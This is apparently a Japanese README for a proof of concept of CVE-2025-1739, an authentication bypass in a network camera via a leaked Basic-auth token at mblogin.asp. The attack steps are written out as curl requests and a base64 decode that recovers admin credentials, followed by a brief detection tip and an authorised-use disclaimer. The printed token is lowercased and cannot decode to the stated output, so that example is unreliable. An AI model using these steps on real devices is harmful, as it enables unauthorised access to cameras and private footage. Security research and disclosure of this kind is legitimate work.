
0day PoC for CVE-2025-1739
| CVE | CVSS v3.1 | スコア | CWE | 種別 |
|---|---|---|---|---|
| CVE-2025-1739 | AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N | 7.1 | CWE-288 | Basic認証情報漏洩による認証バイパス |
このカメラは、mblogin.asp エンドポイントを介して有効なBase64エンコード済みBasic認証トークンを漏洩させます。このトークンは簡単にデコードして再利用でき、パスワードを知らなくてもデバイスへの不正アクセスが可能になります。
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
レスポンスには有効なBasic認証トークンが含まれます:
ywrtaw46vw5ndwvzc2fibguxmjmh
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Output: admin:unguessable123!
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/
activex_pal.asp および mblogin.asp への予期しないアクセスを監視する。このリポジトリは、教育目的および許可を得たセキュリティ研究専用です。著者は不正使用について一切責任を負いません。デバイスをテストする前に必ず明示的な許可を取得してください。